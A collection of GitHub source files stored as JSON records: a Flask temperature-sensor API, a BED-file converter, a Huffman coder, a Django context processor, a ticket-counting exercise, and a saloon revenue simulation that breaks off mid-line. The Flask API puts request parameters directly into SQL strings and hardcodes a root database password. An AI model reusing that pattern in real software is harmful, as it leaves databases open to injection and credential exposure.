+{"seq_id":"41930547761","text":"# distance calculation\n\nimport math\nimport time\nimport flask\nfrom flask import Flask\nimport requests\nfrom flask import request, jsonify\nfrom pymysql import *\nimport sys\nimport pandas as pd\nfrom flask import send_file\nfrom flask import render_template\n\napiKey = '**********'\ndb_name = \"guy_temps\"\nport = '1234'\nchart_template = 'chart_line.html'\n\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n#db_opts = {'user': 'root', 'password': 'pass2014', 'host': '172.17.0.3', 'database': 'temprature'}\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return 'Temperature data restAPI1> Take a look
for details, contact   guy@example.com '\n\n\n@app.route('/temperature', methods=['GET']) # df2 = df[\"Fee\"].mean()\ndef calculate():\n if 'key' in request.args:\n if str(request.args['key']) == apiKey:\n if 'act' in request.args:\n\n if str(request.args['act']) == 'avg':\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'from' in request.args:\n if 'to' in request.args:\n sql = f'select * from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n else:\n return 'Missing TO'\n else: \n sql = f\"SELECT * FROM {db_name}\"\n cursor.execute(sql)\n df = pd.read_sql(sql, connection)\n print(df)\n df2 = df[\"temp\"].mean()\n avg_value = str(df2)\n connection.close()\n return f'average value of Temp : {avg_value}'\n \n if str(request.args['act']) == 'min':\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'from' in request.args:\n if 'to' in request.args:\n sql = f'select min(temp), time_stamp, humid from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n else:\n return 'Missing TO'\n else: \n sql = f\"SELECT min(temp), time_stamp, humid FROM {db_name}\"\n result = cursor.execute(sql)\n connection.commit()\n r = []\n for row in cursor:\n r.append(row)\n '''\n df = pd.read_sql(sql, connection)\n column = df[\"temp\"]\n index = df['temp'].idxmin()\n min_value = str([index+1, column.min()]) '''\n connection.close()\n return str(r)\n \n if str(request.args['act']) == 'max':\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'from' in request.args:\n if 'to' in request.args:\n sql = f'select max(temp), time_stamp, humid from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n else:\n return 'Missing TO'\n else: \n sql = f\"SELECT max(temp), time_stamp, humid FROM {db_name}\"\n \n result = cursor.execute(sql)\n connection.commit()\n r = []\n for row in cursor:\n r.append(row)\n '''\n df = pd.read_sql(sql, connection)\n column = df[\"temp\"]\n timeStamp = df['time_stamp']\n index = df['temp'].idxmax()\n max_value = str([index+1, column.max()]) '''\n connection.close()\n return str(r)\n \n if str(request.args['act']) == 'save2file':\n csv_file_path = f'/tmp/temp_data_{time.time()}.csv'\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'from' in request.args:\n if 'to' in request.args:\n sql = f'select * from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n else:\n return 'Missing TO'\n else: \n sql = f\"SELECT * FROM {db_name}\"\n cursor.execute(sql)\n df = pd.read_sql(sql, connection)\n #print(df)\n #data = '[{x:1, y:1}, {x:5, y:2}, {x:10, y:3}]'\n df.to_csv(csv_file_path, sep=',', encoding='utf-8',index=False) \n file_obj =csv_file_path\n connection.close()\n return send_file(file_obj, mimetype=\"text/csv\", attachment_filename=csv_file_path, )\n \n if str(request.args['act']) == 'count':\n r=[]\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as 
cursor:\n sql = f\"SELECT count(*) FROM {db_name} ;\"\n result = cursor.execute(sql)\n connection.commit()\n for row in cursor:\n r.append(row)\n connection.close()\n return str(r)\n \n if str(request.args['act']) == 'read':\n r=[]\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'day' in request.args:\n days = request.args[\"day\"]\n timeStampTo = int(time.time())\n timeStampFrom = int(timeStampTo)-(86413*int(days))\n sql = f'select time_stamp, temp, humid from {db_name} where time_stamp between {str(timeStampFrom)} and {str(timeStampTo)} ORDER BY ID DESC ;'\n else:\n sql = f\"SELECT * FROM {db_name} ORDER BY ID DESC LIMIT 1 ;\"\n print(sql)\n result = cursor.execute(sql)\n connection.commit()\n for row in cursor:\n r.append(f' {row}')\n connection.close() \n return str(r)\n\n if str(request.args['act']) == 'readall':\n r=[]\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'from' in request.args:\n if 'to' in request.args:\n sql = f'select * from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n else:\n return 'Missing TO'\n else:\n sql = f\"SELECT * FROM {db_name} ;\"\n result = cursor.execute(sql)\n connection.commit()\n for row in cursor:\n r.append(f'{row} ')\n connection.close()\n return str(r)\n \n if str(request.args['act']) == 'chart':\n timeLine = []\n tData = []\n hData = []\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'day' in request.args:\n days = request.args[\"day\"]\n timeStampTo = int(time.time())\n timeStampFrom = int(timeStampTo)-(86413*int(days))\n sql = f'select time_stamp, temp, humid from {db_name} where time_stamp between {str(timeStampFrom)} and {str(timeStampTo)}'\n else:\n if 'from' in request.args:\n if 'to' in request.args:\n timeStampFrom =str(request.args[\"from\"])\n timeStampTo = str(request.args[\"to\"])\n sql = f'select time_stamp, temp, humid from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n max_x =str(request.args[\"from\"])\n min_x = str(request.args[\"to\"])\n else:\n return 'Missing [TO]'\n else:\n sql = f\"SELECT temp, time_stamp, humid FROM {db_name} ;\"\n print(sql)\n result = cursor.execute(sql)\n rows = cursor.fetchall()\n for row in rows:\n # add a check, if temp is not bigger or smaller that 25% of AVG, else remove\n timeLine.append(row[\"time_stamp\"])\n tData.append(row['temp'])\n hData.append(row['humid'])\n \n df = pd.read_sql(sql, connection)\n timeStampFrom = int(df['time_stamp'].min())\n timeStampTo = int(df['time_stamp'].max())\n print(f' timeStampFrom => {timeStampFrom}, timeStampTo => {timeStampTo}')\n cold = df['temp'].min()\n hot = df['temp'].max()\n \n sql = f\"SELECT humid, temp FROM {db_name} ORDER BY ID DESC LIMIT 1 ;\"\n result = cursor.execute(sql)\n connection.commit()\n for row in cursor:\n currentHumid = str((row['humid']))\n currentTemp = str((row['temp']))\n connection.close()\n\n return render_template(chart_template, members=timeLine, temp_values=tData, \\\n humid_values=hData, max_x=timeStampTo, min_x=timeStampFrom,\\\n min_y=str(cold), max_y=str(hot), sTime=str(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(int(timeStampFrom)))), \\\n 
eTime=time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(int(timeStampTo))), currentT=str(currentTemp), \\\n                           currentH=str(currentHumid), currentTime=time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(int(time.time()))))\n            \n            if str(request.args['act']) == 'write':\n                if 'timeStamp' in request.args:\n                    timeStamp = str(request.args['timeStamp'])\n                if 'temp' in request.args:\n                    temp = str(request.args['temp'])\n                if 'humid' in request.args:\n                    humid = str(request.args['humid'])\n                connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n                with connection.cursor() as cursor:\n                    sql = \"INSERT INTO {} (temp, time_stamp, humid) VALUES (\\'{}\\', \\'{}\\', \\'{}\\')\".format(db_name, temp, timeStamp, humid)\n                    cursor.execute(sql)\n                    connection.commit()\n                connection.close()\n                return 'Saved to DB'\n        else:\n            return 'Missing Action'\n    else:\n        return 'Missing Key'\n\napp.run(host='0.0.0.0', port=port)\n# app.run(host='0.0.0.0', port='8094')\n","repo_name":"guy111a/ioT_restAPI","sub_path":"tempAPI_2.py","file_name":"tempAPI_2.py","file_ext":"py","file_size_in_byte":13573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
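A hedged client-side sketch against the API above (the key must match whatever apiKey holds; the route, parameter names, and response format come from the handlers; requests is already a dependency of the module):

    import requests

    r = requests.get('http://localhost:1234/temperature',
                     params={'key': '<apiKey value>', 'act': 'avg'})
    print(r.text)  # e.g. 'average value of Temp : 21.4'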
+{"seq_id":"27548791116","text":"#!/usr/bin/env python\n\"\"\"\nSome tools save files in BED tabular format but erroneously use 1-based\nindexing, instead of the prescribed 0-based indexing. This tool merely reads\nthe file, subtracts one from the interval start location, and saves to a new\nfile.\n\"\"\"\nimport argparse\n\nimport pybedtools as bt\n\n\ndef is_insertion(ival):\n \"\"\"Determine whether an interval represents an insertion variant.\n\n Parameters\n ----------\n ival : Interval object\n The interval being evaluated.\n\n Returns\n -------\n is_ins : bool\n ``True`` if `ival` represents an insertion.\n\n Notes\n -----\n This function assumes a FAVR formatted file, with variant type noted\n in the 18th column (0-indexed).\n \"\"\"\n is_ins = ival.fields[18].endswith('insertion')\n return is_ins\n\n\ndef start_subtract_one(ival):\n \"\"\"Subtract 1 to the start of an Interval, unless it is an insertion.\n\n Parameters\n ----------\n ival : Interval object\n The interval to be modified.\n\n Returns\n -------\n ival0 : Interval object\n The modified interval.\n \"\"\"\n if not is_insertion(ival):\n ival.start -= 1\n return ival\n\n\ndef favr_to_zero_index(bed):\n \"\"\"Convert a one-based BedTool object to a zero-based one.\n\n Parameters\n ----------\n bed : BedTool object\n The input BED object.\n\n Returns\n -------\n bed0 : BedTool object\n The modified BED object.\n \"\"\"\n bed0 = bed.each(start_subtract_one)\n return bed0\n\n\ndef main():\n \"\"\"Convert FAVR-indexed to BED-indexed files.\n \"\"\"\n parser = argparse.ArgumentParser(\n description='Compute coverage and other stats of BED files.')\n parser.add_argument('bed_files', nargs='+', metavar='BEDFILE',\n help='One or more BED files.')\n parser.add_argument('-s', '--suffix', default='.0.bed',\n help='Append this suffix to mark output filename.')\n args = parser.parse_args()\n for fn in args.bed_files:\n b = bt.BedTool(fn)\n b0 = favr_to_zero_index(b)\n b0.saveas(fn + args.suffix)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"jni/genome-scripts","sub_path":"bedify.py","file_name":"bedify.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"4523972754","text":"import json\nclass node:\n def __init__(self, freq, symbol, left = None, right = None):\n # Frequency of symbol\n self.freq = freq\n\n # Symbol itself\n self.symbol = symbol\n\n # left node\n self.left = left\n \n # Right node\n self.right = right\n\n # Tree Direction \n self.huff = ''\n\ndict = {} # Mapping each character to its corresponding huffman codes\nreverseDict = {} # Mapping huffman codes to each corresponding charater\n\n# Recursive function to get huffman codes corresponding to each character\ndef printNodes(node, val = ''):\n newVal = val + str(node.huff)\n\n if node.left is not None:\n printNodes(node.left, newVal)\n\n if node.right is not None:\n printNodes(node.right, newVal)\n\n if node.left is None and node.right is None:\n dict[node.symbol] = newVal\n reverseDict[newVal] = node.symbol\n\n# Encoding the given string to corresponding huffman codes\ndef getEncodedText(originalText):\n encodedText = \"\"\n for i in originalText:\n encodedText = encodedText + dict[i]\n return encodedText\n\n# Adding padding at last so at to make the length of encoded string a multiple of 8\n# Also adding the length of padding aaded in front in 8-bits format only\ndef getPaddedEncodedText(encodedText):\n extra_padding = 8 - len(encodedText) % 8\n for i in range(0, extra_padding):\n encodedText += \"0\"\n padded_info = \"{0:08b}\".format(extra_padding)\n encodedText = padded_info + encodedText\n return encodedText\n\n# Converting each set to 8-bits to its corresponding byte character\ndef getByteArray(paddedEncodedText):\n b = bytearray()\n for i in range(0, len(paddedEncodedText), 8):\n byte = paddedEncodedText[i:i+8]\n b.append(int(byte, 2))\n return b\n\n# Function called by main file providing string data to encode \n# Return decoded string and reverseDict codes\ndef encode(originalText):\n freq = {}\n originalText = originalText.rstrip()\n\n # Grenerating freq map\n for i in originalText:\n freq[i] = 0\n for i in originalText:\n freq[i] = freq[i] + 1\n\n generateHuffmanCodes(freq)\n encodedText = getEncodedText(originalText)\n paddedEncodedText = getPaddedEncodedText(encodedText)\n byteArray = getByteArray(paddedEncodedText)\n\n return reverseDict, byteArray\n\n# Function creating huffman tree and further calling printNodes to create huffman codes map\ndef generateHuffmanCodes(freq):\n nodes = []\n for i in freq:\n nodes.append(node(freq[i], i))\n while len(nodes) > 1:\n nodes = sorted(nodes, key = lambda x:x.freq)\n\n left = nodes[0]\n right = nodes[1]\n\n left.huff = 0\n right.huff = 1\n\n newNode = node(left.freq + right.freq, '#', left, right)\n\n nodes.remove(left)\n nodes.remove(right)\n nodes.append(newNode)\n \n # Huffman Tree is ready\n if(len(nodes) > 0):\n printNodes(nodes[0])\n\n# Function extracting padding length and removing it\ndef remove_padding(padded_encoded_text):\n padded_info = padded_encoded_text[:8]\n extra_padding = int(padded_info, 2)\n padded_encoded_text = padded_encoded_text[8:]\n encoded_text = padded_encoded_text[:-1*extra_padding]\n return encoded_text\n\n# Decoding to the original text from the encoded binar string and reverse mapping\ndef decode_text(encoded_text, reverse_mapping):\n current_code = \"\"\n decoded_text = \"\"\n for bit in encoded_text:\n current_code += bit\n if(current_code in reverse_mapping):\n character = reverse_mapping[current_code]\n decoded_text += character\n current_code = \"\"\n return decoded_text\n\n# Function decoding the encoded byte_string and reverse_mapping to the original text \ndef 
decode(byte_string, reverse_mapping):\n # Converting the byte string to the corresponding binary string\n bit_string = \"\"\n for byte in byte_string:\n bits = bin(byte)[2:].rjust(8, '0')\n bit_string += bits\n encoded_text = remove_padding(bit_string)\n decompressed_text = decode_text(encoded_text, reverse_mapping)\n return decompressed_text\n\n \n\n","repo_name":"coder-saab001/Optimised-Notepad","sub_path":"HuffmanCoding.py","file_name":"HuffmanCoding.py","file_ext":"py","file_size_in_byte":4147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
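A quick round-trip sketch of the two entry points above (the sample string is arbitrary; note that encode() strips trailing whitespace and keeps its code tables in module-level dicts):

    sample = "huffman coding compresses common symbols"
    codes, compressed = encode(sample)
    assert decode(compressed, codes) == sample
    print(len(sample.encode()), '->', len(compressed), 'bytes')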
+{"seq_id":"5725033450","text":"from django.urls import reverse\nfrom django.conf import settings\nfrom app.models import CartItem\nfrom app.views import _get_cart_key\nfrom custom.helpers import is_member_of_admins, return_insights_script\nimport logging\n\nlogger = logging.getLogger()\n\ndef context(request):\n claims = request.identity_context_data._id_token_claims\n exclude_claims = ['iat', 'exp', 'nbf', 'uti', 'aio', 'rh']\n claims_to_display = {claim: value for claim,\n value in claims.items() if claim not in exclude_claims}\n\n logger.debug(f\"function: context, claims_to_display: {claims_to_display}\")\n\n if 'oid' in claims_to_display:\n is_admin = is_member_of_admins(\n claims_to_display['oid'], settings.AZURE_CONFIG.azure_aad_b2c_tenant)\n else:\n is_admin = False\n\n client_id = settings.AAD_CONFIG.client.client_id\n aad_link = \"https://portal.azure.com/#blade/Microsoft_AAD_RegisteredApps/ApplicationMenuBlade/Authentication/appId/\" + client_id + \"/isMSAApp/\"\n\n item_count = 0\n try:\n cart_items = CartItem.objects.filter(cart_key=_get_cart_key(request))\n if cart_items:\n for cart_item in cart_items:\n item_count += cart_item.quantity\n except CartItem.DoesNotExist:\n item_count = 0\n\n script = return_insights_script(settings.AZURE_CONFIG.azure_insights.instrumentation_key)\n\n return dict(is_admin=is_admin, item_count=item_count, claims_to_display=claims_to_display,\n redirect_uri_external_link=request.build_absolute_uri(\n reverse(settings.AAD_CONFIG.django.auth_endpoints.redirect)),\n aad_link=aad_link, insights_script=script)\n","repo_name":"awku/relativity-azure-project","sub_path":"webapp/project/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"1894016325","text":"command = input()\r\n\r\nstudent_tickets = 0\r\nstandard_tickets = 0\r\nkids_tickets = 0\r\ncombine_tickets = 0\r\ntickets_sold = 0\r\ncinema_is_full = False\r\n\r\nwhile command != 'Finish':\r\n movie_name = command\r\n free_seats = int(input())\r\n total_seats = free_seats\r\n for movie in range(free_seats):\r\n ticket_type = input()\r\n if total_seats < 0 or ticket_type == 'End':\r\n cinema_is_full = True\r\n break\r\n if ticket_type == 'student':\r\n student_tickets += 1\r\n elif ticket_type == 'standard':\r\n standard_tickets += 1\r\n elif ticket_type == 'kid':\r\n kids_tickets += 1\r\n total_seats -= 1\r\n tickets_sold += 1\r\n combine_tickets = student_tickets + standard_tickets + kids_tickets\r\n hall_percentage = tickets_sold / free_seats * 100\r\n print(f\"{movie_name} - {hall_percentage:.2f}% full.\")\r\n tickets_sold = 0\r\n command = input()\r\nkids = kids_tickets / combine_tickets * 100\r\nstandard = standard_tickets / combine_tickets * 100\r\nstudent = student_tickets / combine_tickets * 100\r\nprint(f\"Total tickets: {combine_tickets}\")\r\nprint(f\"{student:.2f}% student tickets.\")\r\nprint(f\"{standard:.2f}% standard tickets.\")\r\nprint(f\"{kids:.2f}% kids tickets.\")\r\n","repo_name":"LazChu/SoftUni-projects","sub_path":"Programming Basics with Python/exams/exam 6-7 april/cinema_tickets.py","file_name":"cinema_tickets.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"1195840273","text":"import numpy as np\nfrom random import shuffle, seed\nfrom time import perf_counter\n\n# Convenience funtion to get the upcoming event\ndef get_next_event(events_list):\n event_times = [x[0] for x in events_list]\n t = min(event_times)\n return event_times.index(t)\n\n\ndef model(\n time_horizon,\n bartenders, # Each bartender is represented as a list containing T/F (Female/Male)\n customer_lambda, # mins\n p_drink,\n serve_time, # mins\n flirt_time, # mins\n drink_time, # mins\n drink_price, # $\n avg_tip, # $\n patience_threshold, # mins\n pmin_queue_shootout,\n p_queue_shootout,\n p_pianist_killed,\n pianist_net_worth, # $\n shootout_loss, # $\n poker_table_size, # people\n poker_length, # mins\n p_leave,\n p_lost_everything,\n p_jackpot, # This is cumulative, including p_lost_everything\n):\n bartenders_in_simulation = [[bartender, 0] for bartender in bartenders]\n # Each bartender is represented as a list containing T/F (Female/Male) and\n # a numeric variable indicating the time when the next action is finished\n\n sheriff_entry = np.random.uniform() * time_horizon\n events = [(np.random.exponential(customer_lambda), 'Customer_choice', 'new'),\n (sheriff_entry, 'Sheriff_entry'), (sheriff_entry + 60, 'Sheriff_exit'),\n (240, 'Lambda_down')]\n revenue = 0\n customer_count = 0\n poker_table = 0\n event_history = []\n clock = (0, 'start')\n sheriff_present = False\n\n # The event loop\n while clock[0] < time_horizon:\n\n # Check event type\n if clock[1] == 'Customer_choice':\n # Does he stay in the saloon?\n if (clock[2] == 'existing') & (np.random.uniform() < p_leave):\n customer_count -= 1\n else:\n if clock[2] == 'new':\n # Increase guest count\n customer_count += 1\n # Generate next customer\n events.append((clock[0] + np.random.exponential(customer_lambda),\n 'Customer_choice', 'new'))\n # Choose action\n if poker_table < poker_table_size:\n if np.random.uniform() < p_drink:\n events.append((clock[0], 'Customer_drinks'))\n else:\n poker_table += 1\n if poker_table == poker_table_size:\n events.append((clock[0] + poker_length, 'Poker_finish'))\n else:\n events.append((clock[0], 'Customer_drinks'))\n\n if clock[1] == 'Customer_drinks':\n waiting_time = np.inf\n shuffle(bartenders_in_simulation) # works inplace\n for x in bartenders_in_simulation:\n if x[1] <= clock[0]:\n # A free bartender available, customer is served\n # Potentially check whether an if or random number generation is faster here\n duration = x[0] * flirt_time * np.random.uniform() + serve_time\n x[1] = clock[0] + duration\n revenue += drink_price + np.random.gamma(shape=5, scale=avg_tip / 5) * x[0]\n events.append((clock[0] + duration + np.random.exponential(drink_time),\n 'Customer_choice', 'existing'))\n waiting_time = False\n break\n else:\n waiting_time = min(waiting_time, x[1])\n # Can we handle waiting within the same loop without creating an extra iteration?\n\n # If no bartender, wait at the bar\n if waiting_time:\n # Calculate cumulative waiting time\n try:\n time_in_queue = clock[2] + waiting_time - clock[0]\n except IndexError:\n time_in_queue = waiting_time - clock[0]\n # Determine if client gets nervous\n if time_in_queue > patience_threshold:\n if np.random.uniform() < max(pmin_queue_shootout, clock[0] / 600 * p_queue_shootout):\n events.append((clock[0] + patience_threshold, 'Shootout'))\n else:\n events.append((waiting_time, 'Customer_drinks', time_in_queue))\n\n elif clock[1] == 'Sheriff_entry':\n sheriff_present = True\n\n elif clock[1] == 'Sheriff_exit':\n 
sheriff_present = False\n\n elif clock[1] == 'Shootout':\n if not sheriff_present:\n event_history.append(clock)\n revenue -= shootout_loss * max(1, np.log(clock[0]) / np.log(420)) + (\n np.random.uniform() < p_pianist_killed) * pianist_net_worth\n return revenue, event_history\n # Decide on scenario handling here\n\n elif clock[1] == 'Poker_finish':\n outcome = np.random.uniform()\n if outcome < p_lost_everything:\n # The loser starts a shootout\n events.append((clock[0], 'Shootout'))\n elif outcome < p_jackpot:\n # The winner buys everybody a round\n revenue += customer_count * drink_price\n # Some players stay, some leave, some grab a drink\n poker_table = np.random.randint(poker_table_size)\n leavers = np.random.binomial(poker_table_size - poker_table, p_leave)\n customer_count -= leavers\n if (poker_table_size - poker_table - leavers) > 0:\n events.append(\n (clock[0], 'Customer_drinks') * (poker_table_size - poker_table - leavers))\n \n elif clock[1] == 'Lambda_down':\n customer_lambda -= 5 # Avg time between new customers 5 mins shorter\n\n event_history.append(clock)\n # Get next event\n clock = events.pop(get_next_event(events))\n\n return revenue, event_history\n\n\ndef run_simulation(\n n_simulations,\n time_horizon=10 * 60,\n bartenders=(False, True),\n customer_lambda=25,\n p_drink=0.9,\n serve_time=5,\n flirt_time=15,\n drink_time=35,\n drink_price=2,\n avg_tip=1,\n patience_threshold=15,\n pmin_queue_shootout=0.03,\n p_queue_shootout=0.06,\n p_pianist_killed=0.05,\n pianist_net_worth=450,\n shootout_loss=200,\n poker_table_size=5,\n poker_length=10,\n p_leave=0.1,\n p_lost_everything=0.02,\n p_jackpot=0.04,\n):\n revenues = np.zeros(n_simulations)\n event_histories = []\n for simulation_number in range(n_simulations):\n result, history = \\\n model(\n time_horizon=time_horizon,\n bartenders=bartenders,\n customer_lambda=customer_lambda,\n p_drink=p_drink,\n serve_time=serve_time,\n flirt_time=flirt_time,\n drink_time=drink_time,\n drink_price=drink_price,\n avg_tip=avg_tip,\n patience_threshold=patience_threshold,\n pmin_queue_shootout=pmin_queue_shootout,\n p_queue_shootout=p_queue_shootout,\n p_pianist_killed=p_pianist_killed,\n pianist_net_worth=pianist_net_worth,\n shootout_loss=shootout_loss,\n poker_table_size=poker_table_size,\n poker_length=poker_length,\n p_leave=p_leave,\n p_lost_everything=p_lost_everything,\n p_jackpot=p_jackpot,\n )\n revenues[simulation_number] = result\n event_histories.append(history)\n\n return revenues, event_histories\n\n\n# ## Scenariusz bazowy\n# In[]:\n\nresults_normal, _ = run_simulation(n_simulations=1000)\n\n# In[]:\n\nplot_saving_mode = True\n\n# In[]:\n\n\nprint(\"średni dochód: \" + str(results_normal.mean()))\nprint(\"odchylenie z dochodu: \" + str(results_normal.std()))\n\n\n# In[]:\n\n\nplt.figure(figsize = (8, 4))\nplt.hist(results_normal, bins=100, density = True, color = 'blue')\nplt.ylabel(\"Częstość\")\nplt.xlabel(\"Przychód [$]\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/histogram.pdf')\nelse:\n plt.show()\n\n\n# ## Liczba zatrudnionych barmanów\n# In[]:\n\n\ndef find_opt_solution(max_male, max_female, params = {'n_simulations': 200}):\n bartender_results = np.zeros((max_male+1, max_female+1))\n \n for i in tqdm.tqdm( product( np.arange(max_male+1), np.arange(max_female+1) ) ):\n # creating unique combination of male and female bartenders\n params['bartenders'] = [False] * i[0] + [True] * i[1]\n #running simulation\n results, _ = run_simulation(**params)\n #appending results\n bartender_results[i] = 
results.mean()\n \n path_matrix = np.zeros((max_male + 1, max_female + 1))\n optimum = 0\n diags = [bartender_results[::-1,:].diagonal(i) for i in range(1-bartender_results.shape[0], bartender_results.shape[1])]\n \n for i, x in enumerate(diags):\n i0 = min(i, path_matrix.shape[0]-1) - x.argmax()\n i1 = i-i0\n path_matrix[i0, i1] = x.max() - optimum\n optimum = x.max()\n return bartender_results, path_matrix\n\n# In[]:\n\nbartender_results, path_matrix = find_opt_solution(10, 10, {'n_simulations': 1000})\n\n# In[]:\n\n\nplt.figure(figsize = (8, 5))\nsns.heatmap(bartender_results)\nplt.ylabel(\"Liczba zatrudnionych barmanów płci męskiej\")\nplt.xlabel(\"Liczba zatrudnionych barmanów płci żeńskiej\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/barmani.pdf')\nelse:\n plt.show()\n\n# In[]:\n\n\nplt.figure(figsize = (8,5))\nsns.set(style = 'whitegrid')\nsns.heatmap(path_matrix, cmap = 'seismic_r', center = 0)\nplt.ylabel(\"Liczba zatrudnionych barmanów płci męskiej\")\nplt.xlabel(\"Liczba zatrudnionych barmanów płci żeńskiej\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/opt_sciezka.pdf')\nelse:\n plt.show()\n\n# ## Strategia cenowa\n# In[]:\n\n\nresults_expensive, _ = run_simulation(n_simulations=n_simulations, drink_price=4, patience_threshold=10)\nresults_cheap, _ = run_simulation(n_simulations=n_simulations)\nresults_super_cheap, _ = run_simulation(\n n_simulations=n_simulations,\n drink_price=1,\n patience_threshold=20,\n customer_lambda=10)\n\n\n# In[]:\n\n\nprint(\"średnia:\")\nprint(\"droższe drinki: \" + str(results_expensive.mean()))\nprint(\"tańsze drinki: \" + str(results_cheap.mean()))\nprint(\"super tanie drinki: \" + str(results_super_cheap.mean()))\n\nprint(\"\\nodchylenie:\")\nprint(\"droższe drinki: \" + str(results_expensive.std()))\nprint(\"tańsze drinki: \" + str(results_cheap.std()))\nprint(\"super tanie drinki: \" + str(results_super_cheap.std()))\n\n\n# In[]:\n\n\nplt.figure(figsize=(8, 4))\ndf_to_plot = pd.DataFrame(\n {\n \"Strategia cenowa salonu\": \n [\"normalne ceny\"] * n_simulations + \n [\"niskie ceny\"] * n_simulations + \n [\"wysokie ceny\"] * n_simulations,\n \"Przychód [$]\": np.concatenate((results_cheap, results_super_cheap, results_expensive), axis=0)\n }\n)\nax = sns.barplot(x=\"Strategia cenowa salonu\", y=\"Przychód [$]\", data=df_to_plot, ci=\"sd\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/drinki.pdf')\nelse:\n plt.show()\n\n\n# # Więlkosc stolow do pokera\n# In[]:\n\n\nresults_normal, _ = run_simulation(n_simulations=n_simulations)\nresults_1, _ = run_simulation(n_simulations=n_simulations, poker_table_size=6, poker_length=15)\nresults_2, _ = run_simulation(n_simulations=n_simulations, poker_table_size=7, poker_length=20)\nresults_3, _ = run_simulation(n_simulations=n_simulations, poker_table_size=8, poker_length=25)\n\n\n# In[]:\n\n\nplt.figure(figsize=(8,4))\ndf_to_plot = pd.DataFrame(\n {\n \"Stół do pokera\": \n [\"na 5 graczy\"] * n_simulations + [\"na 6 graczy\"] * n_simulations + [\"na 7 graczy\"] * n_simulations + [\"na 8 graczy\"] * n_simulations,\n \"Przychód [$]\": np.concatenate((results_normal, results_1, results_2, results_3), axis=0)\n }\n)\nsns.barplot(x=\"Stół do pokera\", y=\"Przychód [$]\", data=df_to_plot, ci=\"sd\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/poker.pdf')\nelse:\n plt.show()\n\n\n# In[]:\n\n\nprint(\"średni przychód normal: \" + str(results_normal.mean()))\nprint(\"średni przychód 1: \" + str(results_1.mean()))\nprint(\"średni przychód 2: \" + 
str(results_2.mean()))\nprint(\"średni przychód 3: \" + str(results_3.mean()))\n\nprint(\"odchylenie normal: \" + str(results_normal.std()))\nprint(\"odchylenie przychód 1: \" + str(results_1.std()))\nprint(\"odchylenie przychód 2: \" + str(results_2.std()))\nprint(\"odchylenie przychód 3: \" + str(results_3.std()))\n\n\n\n\n\n\n\n\n# # Analiza wrażliwości\n\n# ## Zatrudnianie ładniejszych kelnerek\n\n# In[]:\n\nn_simulations = 1000\nbartenders_opt = [True, True, True]\n\n# In[]:\n\nresults_normal, _ = run_simulation(n_simulations=n_simulations,\n bartenders = bartenders_opt)\nresults_beautiful, _ = run_simulation(n_simulations=n_simulations,\n bartenders = bartenders_opt,\n flirt_time=25,\n avg_tip=5)\n\n\n# In[]:\n\nplt.figure(figsize=(8,4))\ndf_to_plot = pd.DataFrame(\n {\n \"Personel\": \n [\"ładny\"] * n_simulations + [\"ładniejszy\"] * n_simulations,\n \"Przychód [$]\": np.concatenate((results_normal, results_beautiful), axis=0)\n }\n)\nax = sns.barplot(x=\"Personel\", y=\"Przychód [$]\", data=df_to_plot, ci=\"sd\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/personel.pdf')\nelse:\n plt.show()\n\n\n# In[]:\n\n\nprint(\"średni przychód ładna: \" + str(results_normal.mean()))\nprint(\"średni przychód ładniejsza: \" + str(results_beautiful.mean()))\n\nprint(\"odchylenie ładna: \" + str(results_normal.std()))\nprint(\"odchylenie ładniejsza: \" + str(results_beautiful.std()))\n\n# In[ ]:\n\nbartender_results_pretty, path_matrix_pretty = find_opt_solution(10, 10, {'n_simulations': n_simulations,\n 'flirt_time':25, 'avg_tip':5})\n\n\n# In[ ]:\n\nplt.figure(figsize = (8, 